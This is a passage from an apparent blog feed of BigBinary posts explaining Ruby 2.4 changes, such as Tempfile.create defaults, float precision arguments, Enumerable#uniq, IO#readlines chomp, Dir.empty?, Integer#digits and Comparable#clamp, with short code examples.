#=&gt; INFO 2017-03-16 18:43:58 +0530 ==&gt; App: bigbinary, Message: Program started...</code></pre><p>Here is the same code in Ruby 2.4.</p><pre><code class="language-ruby"># ruby 2.4
require 'logger'

logger = Logger.new(STDOUT,
  level: Logger::INFO,
  progname: 'bigbinary',
  datetime_format: '%Y-%m-%d %H:%M:%S',
  formatter: proc do |severity, datetime, progname, msg|
    &quot;#{severity} #{datetime} ==&gt; App: #{progname}, Message: #{msg}\n&quot;
  end)

logger.info(&quot;Program started...&quot;)
#=&gt; INFO 2017-03-16 18:47:39 +0530 ==&gt; App: bigbinary, Message: Program started...</code></pre>]]></content>
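A runnable sketch of the Ruby 2.4 constructor options, logging to a `StringIO` so the effect of `level` and `formatter` is visible (the buffer and messages are illustrative, not from the post):

```ruby
require 'logger'
require 'stringio'

buffer = StringIO.new
logger = Logger.new(buffer,
  level: Logger::WARN,
  progname: 'bigbinary',
  formatter: proc do |severity, _datetime, progname, msg|
    "#{severity} #{progname}: #{msg}\n"
  end)

logger.info('below the WARN level, so discarded') # filtered out by level:
logger.warn('disk space low')                     # goes through the custom formatter

buffer.string #=> "WARN bigbinary: disk space low\n"
```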
    </entry><entry>
       <title><![CDATA[Ruby 2.4 has default basename for Tempfile#create]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-4-has-default-basename-for-tempfile-create"/>
      <updated>2017-04-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-4-has-default-basename-for-tempfile-create</id>
       <content type="html"><![CDATA[<h3>Tempfile class</h3><p><a href="http://ruby-doc.org/stdlib-2.4.0/libdoc/tempfile/rdoc/Tempfile.html">Tempfile</a> is used for managing temporary files in Ruby. A Tempfile object creates a temporary file with a unique filename. It behaves just like a File object, and therefore we can perform all the usual file operations on it.</p><h3>Why Tempfile when we can use File</h3><p>These days it is common to store files on services like S3. Let's say that we have a <code>users.csv</code> file on S3. Working with this file remotely is problematic. In such cases it is desirable to download the file to the local machine for manipulation. After the work is done, the file should be deleted. Tempfile is ideal for such cases.</p><h3>Basename for tempfile</h3><p>Prior to Ruby 2.3, if we wanted to create a temporary file, we needed to pass a parameter to it.</p><pre><code class="language-ruby">require 'tempfile'

file = Tempfile.new('bigbinary')
#=&gt; #&lt;Tempfile:/var/folders/jv/fxkfk9_10nb_964rvrszs2540000gn/T/bigbinary-20170304-10828-1w02mqi&gt;</code></pre><p>As we can see above, the generated file name begins with the word &quot;bigbinary&quot;.</p><p>Since Tempfile ensures that the generated filename will always be unique, passing this argument is mostly pointless. The Ruby docs call this argument the &quot;basename&quot;.</p><p>So in Ruby 2.3.0 it was <a href="https://github.com/ruby/ruby/pull/523">decided</a> that the basename parameter was unnecessary for <code>Tempfile#new</code>, and an empty string became the default value.</p><pre><code class="language-ruby">require 'tempfile'

file = Tempfile.new
#=&gt; #&lt;Tempfile:/var/folders/jv/fxkfk9_10nb_964rvrszs2540000gn/T/20170304-10828-1v855bf&gt;</code></pre><p>But the same was not implemented for <code>Tempfile#create</code>.</p><pre><code class="language-ruby"># Ruby 2.3.0
require 'tempfile'

Tempfile.create do |f|
  f.write &quot;hello&quot;
end
ArgumentError: wrong number of arguments (given 0, expected 1..2)</code></pre><p>This was <a href="https://bugs.ruby-lang.org/issues/11965">fixed</a> in Ruby 2.4. So now the basename parameter for <code>Tempfile.create</code> is set to an empty string by default, keeping it consistent with the <code>Tempfile#new</code> method.</p><pre><code class="language-ruby"># Ruby 2.4
require 'tempfile'

Tempfile.create do |f|
  f.write &quot;hello&quot;
end
=&gt; 5</code></pre>]]></content>
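The `=> 5` above is `f.write`'s return value (the number of bytes written), which `Tempfile.create` passes through as the block's result. A small sketch that also shows the file being removed once the block exits:

```ruby
require 'tempfile'

path = nil
result = Tempfile.create do |f| # no basename needed from Ruby 2.4 onwards
  path = f.path
  f.write 'hello' # returns the number of bytes written
end

result            #=> 5
File.exist?(path) #=> false, Tempfile.create deletes the file after the block
```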
    </entry><entry>
       <title><![CDATA[New arguments support for float & integer modifiers]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/new-ndigits-arguments-supported-for-float-modifiers-in-ruby-2-4"/>
      <updated>2017-03-28T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/new-ndigits-arguments-supported-for-float-modifiers-in-ruby-2-4</id>
       <content type="html"><![CDATA[<p>In Ruby, there are many methods available which help us to modify a float or integer value.</p><h3>Ruby 2.3.x</h3><p>In the previous versions of Ruby, we could use methods such as <code>floor</code>, <code>ceil</code> and <code>truncate</code> in the following ways.</p><pre><code class="language-ruby">5.54.floor          #=&gt; 5
5.54.ceil           #=&gt; 6
5.54.truncate       #=&gt; 5</code></pre><p>Providing an argument to these methods would result in an <code>ArgumentError</code> exception.</p><h3>Ruby 2.4</h3><p>The Ruby community decided to <a href="https://bugs.ruby-lang.org/issues/12245">add a precision argument</a>.</p><p>The precision argument, which can be negative, helps us get the result to the required precision on either side of the decimal point.</p><p>The default value for the precision argument is 0.</p><pre><code class="language-ruby">876.543.floor(-2)       #=&gt; 800
876.543.floor(-1)       #=&gt; 870
876.543.floor           #=&gt; 876
876.543.floor(1)        #=&gt; 876.5
876.543.floor(2)        #=&gt; 876.54

876.543.ceil(-2)        #=&gt; 900
876.543.ceil(-1)        #=&gt; 880
876.543.ceil            #=&gt; 877
876.543.ceil(1)         #=&gt; 876.6
876.543.ceil(2)         #=&gt; 876.55

876.543.truncate(-2)    #=&gt; 800
876.543.truncate(-1)    #=&gt; 870
876.543.truncate        #=&gt; 876
876.543.truncate(1)     #=&gt; 876.5
876.543.truncate(2)     #=&gt; 876.54</code></pre><p>These methods all work the same on Integer as well.</p><pre><code class="language-ruby">5.floor(2)              #=&gt; 5.0
5.ceil(2)               #=&gt; 5.0
5.truncate(2)           #=&gt; 5.0</code></pre>]]></content>
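Negative precision is handy beyond rounding display values; for instance, bucketing a number to the nearest multiple of a power of ten. A small sketch (the latency example is ours, not from the post):

```ruby
latency_ms = 734

# floor(-2) zeroes the last two digits: the nearest lower multiple of 100
bucket_floor = latency_ms.floor(-2)
bucket_floor #=> 700

# ceil(-2) gives the upper edge of the same bucket
bucket_ceil = latency_ms.ceil(-2)
bucket_ceil #=> 800
```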
    </entry><entry>
       <title><![CDATA[Ruby 2.4 adds Enumerable#uniq & Enumerable::Lazy#uniq]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/enumerable-uniq-and-enumerable-lazy-uniq-part-of-ruby-2-4"/>
      <updated>2017-03-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/enumerable-uniq-and-enumerable-lazy-uniq-part-of-ruby-2-4</id>
       <content type="html"><![CDATA[<p>In Ruby, we commonly use the <code>uniq</code> method on an array to fetch the collection of all unique elements. But there may be cases where we need the elements of a hash that are unique by value.</p><p>Let's consider an example of countries that have hosted the Olympics. We only want to know when a country hosted it for the first time.</p><pre><code class="language-ruby"># given object
{ 1896 =&gt; 'Athens',
  1900 =&gt; 'Paris',
  1904 =&gt; 'Chicago',
  1906 =&gt; 'Athens',
  1908 =&gt; 'Rome' }

# expected outcome
{ 1896 =&gt; 'Athens',
  1900 =&gt; 'Paris',
  1904 =&gt; 'Chicago',
  1908 =&gt; 'Rome' }</code></pre><p>One way to achieve this is to build a collection of unique country names and then check whether each value is already taken while building the result.</p><pre><code class="language-ruby">olympics =
{ 1896 =&gt; 'Athens',
  1900 =&gt; 'Paris',
  1904 =&gt; 'Chicago',
  1906 =&gt; 'Athens',
  1908 =&gt; 'Rome' }

unique_nations = olympics.values.uniq

olympics.select { |year, country| !unique_nations.delete(country).nil? }
#=&gt; {1896=&gt;&quot;Athens&quot;, 1900=&gt;&quot;Paris&quot;, 1904=&gt;&quot;Chicago&quot;, 1908=&gt;&quot;Rome&quot;}</code></pre><p>As we can see, the above code requires constructing an additional array, <code>unique_nations</code>.</p><p>When processing larger data sets, loading a considerably big array in memory and then carrying out further processing on it may result in performance and memory issues.</p><p>In Ruby 2.4, <code>Enumerable</code> introduces a <code>uniq</code> <a href="https://bugs.ruby-lang.org/issues/11090">method</a> that collects unique elements while iterating over the enumerable object.</p><p>The usage is similar to that of Array#uniq. Uniqueness can be determined by the elements themselves or by a value yielded by the block passed to the <code>uniq</code> method.</p><pre><code class="language-ruby">olympics = {1896 =&gt; 'Athens', 1900 =&gt; 'Paris', 1904 =&gt; 'Chicago', 1906 =&gt; 'Athens', 1908 =&gt; 'Rome'}

olympics.uniq { |year, country| country }.to_h
#=&gt; {1896=&gt;&quot;Athens&quot;, 1900=&gt;&quot;Paris&quot;, 1904=&gt;&quot;Chicago&quot;, 1908=&gt;&quot;Rome&quot;}</code></pre><p>A similar method is also implemented in the <code>Enumerable::Lazy</code> class. Hence we can now call <code>uniq</code> on lazy enumerables.</p><pre><code class="language-ruby">(1..Float::INFINITY).lazy.uniq { |x| (x**2) % 10 }.first(6)
#=&gt; [1, 2, 3, 4, 5, 10]</code></pre>]]></content>
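The block form is useful whenever "first occurrence wins". A small sketch (the event data is made up) keeping the first event per user without a hand-rolled seen-set:

```ruby
events = [
  { user: 'alice', action: 'login'  },
  { user: 'bob',   action: 'login'  },
  { user: 'alice', action: 'logout' }
]

# Enumerable#uniq (Ruby 2.4+) keeps the first element for each distinct block value
first_events = events.uniq { |e| e[:user] }

first_events.map { |e| e[:user] } #=> ["alice", "bob"]
```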
    </entry><entry>
       <title><![CDATA[Ruby 2.4 optimized lstrip & strip for ASCII strings]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-4-has-optimized-lstrip-and-strip-methods"/>
      <updated>2017-03-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-4-has-optimized-lstrip-and-strip-methods</id>
       <content type="html"><![CDATA[<p>Ruby has <code>lstrip</code> and <code>rstrip</code> methods which can be used to remove leading and trailing whitespace respectively from a string.</p><p>Ruby also has a <code>strip</code> method, a combination of lstrip and rstrip, which can be used to remove both leading and trailing whitespace from a string.</p><pre><code class="language-ruby">&quot;    Hello World    &quot;.lstrip    #=&gt; &quot;Hello World    &quot;
&quot;    Hello World    &quot;.rstrip    #=&gt; &quot;    Hello World&quot;
&quot;    Hello World    &quot;.strip     #=&gt; &quot;Hello World&quot;</code></pre><p>Prior to Ruby 2.4, the <code>rstrip</code> method was optimized for performance, but <code>lstrip</code> and <code>strip</code> were somehow missed. In Ruby 2.4, the <code>String#lstrip</code> and <code>String#strip</code> methods too have been <a href="https://bugs.ruby-lang.org/issues/12788">optimized</a> to get the performance benefit of <code>String#rstrip</code>.</p><p>Let's run the following snippet in Ruby 2.3 and Ruby 2.4 to benchmark and compare the performance improvement.</p><pre><code class="language-ruby">require 'benchmark/ips'

Benchmark.ips do |bench|
  str1 = &quot; &quot; * 10_000_000 + &quot;hello world&quot; + &quot; &quot; * 10_000_000
  str2 = str1.dup
  str3 = str1.dup

  bench.report('String#lstrip') do
    str1.lstrip
  end

  bench.report('String#rstrip') do
    str2.rstrip
  end

  bench.report('String#strip') do
    str3.strip
  end
end</code></pre><h4>Result for Ruby 2.3</h4><pre><code class="language-ruby">Warming up --------------------------------------
       String#lstrip     1.000  i/100ms
       String#rstrip     8.000  i/100ms
        String#strip     1.000  i/100ms
Calculating -------------------------------------
       String#lstrip     10.989  ( 0.0%) i/s -     55.000  in   5.010903s
       String#rstrip     92.514  ( 5.4%) i/s -    464.000  in   5.032208s
        String#strip     10.170  ( 0.0%) i/s -     51.000  in   5.022118s</code></pre><h4>Result for Ruby 2.4</h4><pre><code class="language-ruby">Warming up --------------------------------------
       String#lstrip    14.000  i/100ms
       String#rstrip     8.000  i/100ms
        String#strip     6.000  i/100ms
Calculating -------------------------------------
       String#lstrip    143.424  ( 4.2%) i/s -    728.000  in   5.085311s
       String#rstrip     89.150  ( 5.6%) i/s -    448.000  in   5.041301s
        String#strip     67.834  ( 4.4%) i/s -    342.000  in   5.051584s</code></pre><p>From the above results, we can see that in Ruby 2.4, <code>String#lstrip</code> is around 14x faster while <code>String#strip</code> is around 6x faster. <code>String#rstrip</code>, as expected, has nearly the same performance, as it was already optimized in previous versions.</p><h3>Performance remains same for multi-byte strings</h3><p>Strings can have single-byte or multi-byte characters.</p><p>For example, <code>£ Hello World</code> is a multi-byte string because of the presence of <code>£</code>, which is a multi-byte character.</p><pre><code class="language-ruby">'e'.bytesize        #=&gt; 1
'£'.bytesize        #=&gt; 2</code></pre><p>Let's do the performance benchmarking with the string <code>£ hello world</code> instead of <code>hello world</code>.</p><h4>Result for Ruby 2.3</h4><pre><code class="language-ruby">Warming up --------------------------------------
       String#lstrip     1.000  i/100ms
       String#rstrip     1.000  i/100ms
        String#strip     1.000  i/100ms
Calculating -------------------------------------
       String#lstrip     11.147  ( 9.0%) i/s -     56.000  in   5.034363s
       String#rstrip      8.693  ( 0.0%) i/s -     44.000  in   5.075011s
        String#strip      5.020  ( 0.0%) i/s -     26.000  in   5.183517s</code></pre><h4>Result for Ruby 2.4</h4><pre><code class="language-ruby">Warming up --------------------------------------
       String#lstrip     1.000  i/100ms
       String#rstrip     1.000  i/100ms
        String#strip     1.000  i/100ms
Calculating -------------------------------------
       String#lstrip     10.691  ( 0.0%) i/s -     54.000  in   5.055101s
       String#rstrip      9.524  ( 0.0%) i/s -     48.000  in   5.052678s
        String#strip      4.860  ( 0.0%) i/s -     25.000  in   5.152804s</code></pre><p>As we can see, the performance for multi-byte strings is almost the same across Ruby 2.3 and Ruby 2.4.</p><h4>Explanation</h4><p>The optimization is related to how strings are parsed when checking for whitespace. Checking for whitespace in a multi-byte string incurs additional overhead. So the <a href="https://bugs.ruby-lang.org/issues/12788">patch</a> adds an initial condition to check if the string is a single-byte string and, if so, processes it separately.</p><p>In most cases, strings are single-byte, so the performance improvement will be visible and helpful.</p>]]></content>
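The single-byte fast path hinges on whether the string contains only ASCII. `String#ascii_only?` exposes a conceptually similar check, so we can see which of our strings would be eligible for it (the pound sign is used here as a representative multi-byte character):

```ruby
ascii_str     = '    hello world    '
multibyte_str = '    £ hello world    '

ascii_str.ascii_only?     #=> true,  eligible for the optimized single-byte path
multibyte_str.ascii_only? #=> false, falls back to slower multi-byte parsing

# The result is the same either way; only the speed differs
ascii_str.strip     #=> "hello world"
multibyte_str.strip #=> "£ hello world"
```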
    </entry><entry>
       <title><![CDATA[IO#readlines now accepts chomp flag as an argument]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/io-readlines-now-accepts-chomp-flag-as-an-argument"/>
      <updated>2017-03-07T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/io-readlines-now-accepts-chomp-flag-as-an-argument</id>
       <content type="html"><![CDATA[<p>Consider the following file which needs to be read in Ruby. We can use the <code>IO#readlines</code> method to get the lines in an array.</p><pre><code class="language-plaintext"># lotr.txt
Three Rings for the Elven-kings under the sky,
Seven for the Dwarf-lords in their halls of stone,
Nine for Mortal Men doomed to die,
One for the Dark Lord on his dark throne
In the Land of Mordor where the Shadows lie.</code></pre><h3>Ruby 2.3</h3><pre><code class="language-ruby">IO.readlines('lotr.txt')
#=&gt; [&quot;Three Rings for the Elven-kings under the sky,\n&quot;, &quot;Seven for the Dwarf-lords in their halls of stone,\n&quot;, &quot;Nine for Mortal Men doomed to die,\n&quot;, &quot;One for the Dark Lord on his dark throne\n&quot;, &quot;In the Land of Mordor where the Shadows lie.&quot;]</code></pre><p>As we can see, the lines in the array end with a <code>\n</code>, the newline character, which is not skipped while reading the lines. In most cases, the newline character needs to be chomped off. Prior to Ruby 2.4, it could be done in the following way.</p><pre><code class="language-ruby">IO.readlines('lotr.txt').map(&amp;:chomp)
#=&gt; [&quot;Three Rings for the Elven-kings under the sky,&quot;, &quot;Seven for the Dwarf-lords in their halls of stone,&quot;, &quot;Nine for Mortal Men doomed to die,&quot;, &quot;One for the Dark Lord on his dark throne&quot;, &quot;In the Land of Mordor where the Shadows lie.&quot;]</code></pre><h3>Ruby 2.4</h3><p>Since it was a common requirement, the Ruby team decided to <a href="https://bugs.ruby-lang.org/issues/12553">add</a> an optional parameter to the <code>readlines</code> method. So the same can now be achieved in Ruby 2.4 in the following way.</p><pre><code class="language-ruby">IO.readlines('lotr.txt', chomp: true)
#=&gt; [&quot;Three Rings for the Elven-kings under the sky,&quot;, &quot;Seven for the Dwarf-lords in their halls of stone,&quot;, &quot;Nine for Mortal Men doomed to die,&quot;, &quot;One for the Dark Lord on his dark throne&quot;, &quot;In the Land of Mordor where the Shadows lie.&quot;]</code></pre><p>Additionally, the <code>IO#gets</code>, <code>IO#readline</code>, <code>IO#each_line</code> and <code>IO#foreach</code> methods have also been modified to accept an optional chomp flag.</p>]]></content>
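A self-contained sketch, writing a temporary file so the before/after of `chomp: true` is visible without needing `lotr.txt` on disk:

```ruby
require 'tempfile'

with_newlines = without_newlines = nil

Tempfile.create do |f|
  f.puts 'Three Rings for the Elven-kings under the sky,'
  f.puts 'Seven for the Dwarf-lords in their halls of stone,'
  f.flush # make sure the lines are on disk before re-reading

  with_newlines    = IO.readlines(f.path)
  without_newlines = IO.readlines(f.path, chomp: true) # Ruby 2.4+
end

with_newlines.first    #=> "Three Rings for the Elven-kings under the sky,\n"
without_newlines.first #=> "Three Rings for the Elven-kings under the sky,"
```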
    </entry><entry>
       <title><![CDATA[open-uri in Ruby 2.4 allows http to https redirection]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/open-uri-in-ruby-2-4-allows-http-to-https-redirection"/>
      <updated>2017-03-02T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/open-uri-in-ruby-2-4-allows-http-to-https-redirection</id>
       <content type="html"><![CDATA[<p>In Ruby 2.3, if the argument to <code>open-uri</code> is an http URL and the host redirects to https, then <code>open-uri</code> would throw an error.</p><pre><code class="language-ruby">&gt; require 'open-uri'
&gt; open('http://www.google.com/gmail')
RuntimeError: redirection forbidden: http://www.google.com/gmail -&gt; https://www.google.com/gmail/</code></pre><p>To get around this issue, we could use the <a href="https://github.com/open-uri-redirections/open_uri_redirections">open_uri_redirections</a> gem.</p><pre><code class="language-ruby">&gt; require 'open-uri'
&gt; require 'open_uri_redirections'
&gt; open('http://www.google.com/gmail/', :allow_redirections =&gt; :safe)
=&gt; #&lt;Tempfile:/var/folders/jv/fxkfk9_10nb_964rvrszs2540000gn/T/open-uri20170228-41042-2fffoa&gt;</code></pre><h3>Ruby 2.4</h3><p>In Ruby 2.4, this issue is <a href="https://bugs.ruby-lang.org/issues/859">fixed</a>. So now http to https redirection is possible using open-uri.</p><pre><code class="language-ruby">&gt; require 'open-uri'
&gt; open('http://www.google.com/gmail')
=&gt; #&lt;Tempfile:/var/folders/jv/fxkfk9_10nb_964rvrszs2540000gn/T/open-uri20170228-41077-1bkm1dv&gt;</code></pre><p>Note that redirection from https to http will still raise an error, as it did in previous versions, since it has possible security implications.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.4 now has Dir.empty? and File.empty? methods]]></title>
       <author><name>Ratnadeep Deshmane</name></author>
      <link href="https://www.bigbinary.com/blog/dir-emtpy-included-in-ruby-2-4"/>
      <updated>2017-02-28T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/dir-emtpy-included-in-ruby-2-4</id>
       <content type="html"><![CDATA[<p>In Ruby, to check if a given directory is empty or not, we could check it as follows.</p><pre><code class="language-ruby">Dir.entries(&quot;/usr/lib&quot;).size == 2       #=&gt; false
Dir.entries(&quot;/home&quot;).size == 2          #=&gt; true</code></pre><p>Every directory in a Unix filesystem contains at least two entries: <code>.</code> (current directory) and <code>..</code> (parent directory).</p><p>Hence, the code above checks if there are only two entries and, if so, considers the directory empty.</p><p>However, this code only works for UNIX filesystems and fails on Windows machines, as Windows directories don't have <code>.</code> or <code>..</code>.</p><h2>Dir.empty?</h2><p>Considering all this, Ruby has finally <a href="https://bugs.ruby-lang.org/issues/10121">included</a> a new method, <code>Dir.empty?</code>, that takes a directory path as an argument and returns a boolean.</p><p>Here is an example.</p><pre><code class="language-ruby">Dir.empty?('/Users/rtdp/Documents/posts')   #=&gt; true</code></pre><p>Most importantly, this method works correctly on all platforms.</p><h2>File.empty?</h2><p>To check if a file is empty, Ruby has the <code>File.zero?</code> method. This checks if the file exists and has zero size.</p><pre><code class="language-ruby">File.zero?('/Users/rtdp/Documents/todo.txt')    #=&gt; true</code></pre><p>After introducing <code>Dir.empty?</code>, it made sense to <a href="https://bugs.ruby-lang.org/issues/9969">add</a> <code>File.empty?</code> as an alias of <code>File.zero?</code>.</p><pre><code class="language-ruby">File.empty?('/Users/rtdp/Documents/todo.txt')    #=&gt; true</code></pre>]]></content>
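A runnable sketch using a throwaway directory from the `tmpdir` stdlib, so the paths above don't need to exist (the `todo.txt` name is illustrative):

```ruby
require 'tmpdir'

empty_before = empty_after = file_empty = nil

Dir.mktmpdir do |dir|
  empty_before = Dir.empty?(dir) # a freshly created directory has no entries

  path = File.join(dir, 'todo.txt')
  File.write(path, '')

  empty_after = Dir.empty?(dir)   # now contains todo.txt
  file_empty  = File.empty?(path) # the file exists but has zero size
end

empty_before #=> true
empty_after  #=> false
file_empty   #=> true
```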
    </entry><entry>
       <title><![CDATA[Ruby 2.4 Integer#digits extract digits in place-value]]></title>
       <author><name>Rohit Kumar</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-4-implements-integer-digits-for-extracting-digits-in-place-value-notation"/>
      <updated>2017-02-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-4-implements-integer-digits-for-extracting-digits-in-place-value-notation</id>
       <content type="html"><![CDATA[<p>If we want to extract all the digits of an integer <a href="https://en.wikipedia.org/wiki/Positional_notation">from right to left</a>, the newly added <a href="https://bugs.ruby-lang.org/issues/12447">Integer#digits</a> method will come in handy.</p><pre><code class="language-ruby">567321.digits
#=&gt; [1, 2, 3, 7, 6, 5]

567321.digits[3]
#=&gt; 7</code></pre><p>We can also supply a different base as an argument.</p><pre><code class="language-ruby">0123.digits(8)
#=&gt; [3, 2, 1]

0xabcdef.digits(16)
#=&gt; [15, 14, 13, 12, 11, 10]</code></pre><h4>Use case of digits</h4><p>We can use <code>Integer#digits</code> to sum all the digits of an integer.</p><pre><code class="language-ruby">123.to_s.chars.map(&amp;:to_i).sum
#=&gt; 6

123.digits.sum
#=&gt; 6</code></pre><p>Also, while calculating checksums like <a href="https://en.wikipedia.org/wiki/Luhn_algorithm">Luhn</a> and <a href="https://en.wikipedia.org/wiki/Verhoeff_algorithm">Verhoeff</a>, <code>Integer#digits</code> helps in reducing string allocations.</p>]]></content>
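As a sketch of the checksum use case: `digits` yields the least significant digit first, which is exactly the order the Luhn algorithm walks a number in. This implementation is ours, not from the post:

```ruby
# Luhn validity check built on Integer#digits: starting from the check digit,
# double every second digit and sum the digits of any two-digit result.
def luhn_valid?(number)
  sum = number.digits.each_with_index.sum do |digit, index|
    index.odd? ? (digit * 2).digits.sum : digit
  end
  (sum % 10).zero?
end

luhn_valid?(79_927_398_713) #=> true, the canonical valid Luhn example
luhn_valid?(79_927_398_710) #=> false, wrong check digit
```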
    </entry><entry>
       <title><![CDATA[Ruby 2.4 adds compare by identity functionality]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-4-adds-compare-by-identity-functionality-for-sets"/>
      <updated>2016-12-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-4-adds-compare-by-identity-functionality-for-sets</id>
      <content type="html"><![CDATA[<p>In Ruby, the <code>Object#equal?</code> method is used to compare two objects by their identity, that is, whether the two objects are exactly the same object or not. Ruby also has the <code>Object#eql?</code> method, which returns true if two objects have the same value.</p><p>For example:</p><pre><code class="language-ruby">str1 = &quot;Sample string&quot;
str2 = str1.dup
str1.eql?(str2) #=&gt; true
str1.equal?(str2) #=&gt; false</code></pre><p>We can see that the object ids of the objects are not the same.</p><pre><code class="language-ruby">str1.object_id #=&gt; 70334175057920
str2.object_id #=&gt; 70334195702480</code></pre><p>In Ruby, a <a href="http://ruby-doc.org/stdlib-2.4.0/libdoc/set/rdoc/Set.html">Set</a> does not allow duplicate items in its collection. To determine whether two items are equal in a <code>Set</code>, Ruby uses <code>Object#eql?</code> and not <code>Object#equal?</code>.</p><p>So adding two different objects with the same value to a set was not possible prior to Ruby 2.4.</p><h3>Ruby 2.3</h3><pre><code class="language-ruby">require 'set'
set = Set.new #=&gt; #&lt;Set: {}&gt;
str1 = &quot;Sample string&quot; #=&gt; &quot;Sample string&quot;
str2 = str1.dup #=&gt; &quot;Sample string&quot;
set.add(str1) #=&gt; #&lt;Set: {&quot;Sample string&quot;}&gt;
set.add(str2) #=&gt; #&lt;Set: {&quot;Sample string&quot;}&gt;</code></pre><p>But with the new <a href="http://ruby-doc.org/stdlib-2.4.0/libdoc/set/rdoc/Set.html#method-i-compare_by_identity">Set#compare_by_identity method introduced in Ruby 2.4</a>, sets can now compare their values using <code>Object#equal?</code> and check for the exact same objects.</p><h3>Ruby 2.4</h3><pre><code class="language-ruby">require 'set'
set = Set.new.compare_by_identity #=&gt; #&lt;Set: {}&gt;
str1 = &quot;Sample string&quot; #=&gt; &quot;Sample string&quot;
str2 = str1.dup #=&gt; &quot;Sample string&quot;
set.add(str1) #=&gt; #&lt;Set: {&quot;Sample string&quot;}&gt;
set.add(str2) #=&gt; #&lt;Set: {&quot;Sample string&quot;, &quot;Sample string&quot;}&gt;</code></pre><h2>Set#compare_by_identity?</h2><p>Ruby 2.4 also provides the <a href="http://ruby-doc.org/stdlib-2.4.0/libdoc/set/rdoc/Set.html#method-i-compare_by_identity-3F">compare_by_identity? method</a> to know if a set will compare its elements by their identity.</p><pre><code class="language-ruby">require 'set'
set1 = Set.new #=&gt; #&lt;Set: {}&gt;
set2 = Set.new.compare_by_identity #=&gt; #&lt;Set: {}&gt;
set1.compare_by_identity? #=&gt; false
set2.compare_by_identity? #=&gt; true</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.4 MatchData#values_at]]></title>
       <author><name>Rohit Kumar</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2.4-adds-matchdata-values-at-for-extracting-named-and-positional-capture-groups"/>
      <updated>2016-12-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2.4-adds-matchdata-values-at-for-extracting-named-and-positional-capture-groups</id>
      <content type="html"><![CDATA[<h3>Ruby 2.3</h3><p>We can use <code>MatchData#[]</code> to extract named capture and positional capture groups.</p><pre><code class="language-ruby">pattern = /(?&lt;number&gt;\d+) (?&lt;word&gt;\w+)/
pattern.match('100 thousand')[:number]
#=&gt; &quot;100&quot;

pattern = /(\d+) (\w+)/
pattern.match('100 thousand')[2]
#=&gt; &quot;thousand&quot;</code></pre><p>Positional capture groups could also be extracted using <code>MatchData#values_at</code>.</p><pre><code class="language-ruby">pattern = /(\d+) (\w+)/
pattern.match('100 thousand').values_at(2)
#=&gt; [&quot;thousand&quot;]</code></pre><h3>Changes in Ruby 2.4</h3><p>In Ruby 2.4, we can also pass a string or symbol to <code>#values_at</code> to extract named capture groups.</p><pre><code class="language-ruby">pattern = /(?&lt;number&gt;\d+) (?&lt;word&gt;\w+)/
pattern.match('100 thousand').values_at(:number)
#=&gt; [&quot;100&quot;]</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.4 adds infinite? and finite? methods to Numeric]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-4-adds-infinite-method-to-numeric"/>
      <updated>2016-12-19T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-4-adds-infinite-method-to-numeric</id>
      <content type="html"><![CDATA[<h3>Prior to Ruby 2.4</h3><p>Prior to Ruby 2.4, Float and BigDecimal responded to the methods <code>infinite?</code> and <code>finite?</code>, whereas Fixnum and Bignum did not.</p><h4>Ruby 2.3</h4><pre><code class="language-ruby"># infinite?
5.0.infinite?
=&gt; nil
Float::INFINITY.infinite?
=&gt; 1
5.infinite?
NoMethodError: undefined method `infinite?' for 5:Fixnum</code></pre><pre><code class="language-ruby"># finite?
5.0.finite?
=&gt; true
5.finite?
NoMethodError: undefined method `finite?' for 5:Fixnum</code></pre><h4>Ruby 2.4</h4><p>To make the behavior of all numeric values consistent, <a href="https://bugs.ruby-lang.org/issues/12039">infinite? and finite? were added to Fixnum and Bignum</a>, even though for integers <code>infinite?</code> always returns nil and <code>finite?</code> always returns true.</p><p>This gives us the ability to call these methods irrespective of whether the receiver is an integer or a floating point number.</p><pre><code class="language-ruby"># infinite?
5.0.infinite?
=&gt; nil
Float::INFINITY.infinite?
=&gt; 1
5.infinite?
=&gt; nil</code></pre><pre><code class="language-ruby"># finite?
5.0.finite?
=&gt; true
5.finite?
=&gt; true</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.4 adds Comparable#clamp method]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-4-adds-comparable-clamp-method"/>
      <updated>2016-12-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-4-adds-comparable-clamp-method</id>
      <content type="html"><![CDATA[<p>In Ruby 2.4, the <a href="https://bugs.ruby-lang.org/issues/10594">clamp method is added to the Comparable module</a>. This method can be used to clamp an object within a specific range of values.</p><p>The <code>clamp</code> method takes min and max as its two arguments, defining the range of values to which the receiver should be clamped.</p><h4>Clamping numbers</h4><p><code>clamp</code> can be used to keep a number within the range of min, max.</p><pre><code class="language-ruby">10.clamp(5, 20)
=&gt; 10
10.clamp(15, 20)
=&gt; 15
